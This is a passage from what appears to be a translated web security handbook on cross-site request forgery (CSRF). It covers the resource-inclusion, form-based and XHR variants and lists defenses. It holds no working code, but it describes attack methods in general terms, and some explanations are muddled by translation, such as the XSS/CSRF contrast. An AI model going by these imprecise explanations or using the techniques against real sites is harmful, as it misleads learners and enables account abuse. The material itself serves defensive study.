4.3. CSRF

4.3.1. Introduction

Cross-Site Request Forgery (CSRF), also known as One Click Attack or Session Riding, usually abbreviated as CSRF, is a malicious use of websites. Although it sounds like XSS, it is very different from XSS, which exploits trusted users within a site, and CSRF, which exploits trusted websites by masquerading requests from trusted users.

4.3.2. Classification

4.3.2.1. Resource Inclusion

Resource inclusion is the type you might see in most presentations or foundation courses that introduce CSRF concepts. This type boils down to attackers controlling resources contained in HTML tags (eg <image>, <audio>, <video>, <object>, <script>, etc.). Any tag containing a remote resource can complete the attack if the attacker can influence the URL to be loaded.

Due to the lack of origin checking for cookies, as mentioned above, this attack does not require XSS and can be performed by any attacker-controlled site or the site itself. This type is limited to GET requests, as these are the only request types that browsers make for resource URLs. The main limitation of this type is that it requires the wrong way to use secure HTTP requests.

4.3.2.2. Form-based

Often seen when using secure request methods correctly. The attacker creates a form that the victim wants to submit; it contains a JavaScript snippet that forces the victim’s browser to submit.

The form can consist entirely of hidden elements, making it difficult for victims to spot it.

If cookies are not handled properly, an attacker can launch an attack on any site and the attack will be successful as long as the victim is logged in with a valid cookie. If the request is purposeful, a successful attack will return the victim to their usual normal page. This method is particularly effective for phishing attacks where attackers can point victims to specific pages.

4.3.2.3. XMLHttpRequest

XMLHttpRequest is probably the least seen way, and since many modern web applications rely on XHR, many spend a lot of time building and implementing this particular countermeasure.

XHR-based CSRFs usually come in the form of XSS payloads due to SOPs. Without Cross-Origin Resource Sharing (CORS), XHR is limited to origin requests for attackers hosting their own payloads.

The attack payload for this type of CSRF is basically a standard XHR, and attackers have found some way to inject it into the victim’s browser DOM.

4.3.3. Defense

  • Detect user submissions through CSRF-token or verification code

  • Verify Referer/Content-Type

  • For operations such as user modification and deletion, it is best to use POST operations

  • Avoid site-wide cookies and strictly set cookie domains